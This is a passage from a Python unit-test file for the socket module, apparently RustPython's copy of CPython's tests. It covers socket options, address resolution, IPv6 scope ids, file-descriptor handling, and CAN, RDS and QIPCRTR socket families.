self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
# TODO: RUSTPYTHON, windows ioctls
@unittest.expectedFailure
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
# XXX RUSTPYTHON TODO: surrogates in str
# self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
# TODO: RUSTPYTHON, socket.gethostbyname_ex
@unittest.expectedFailure
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
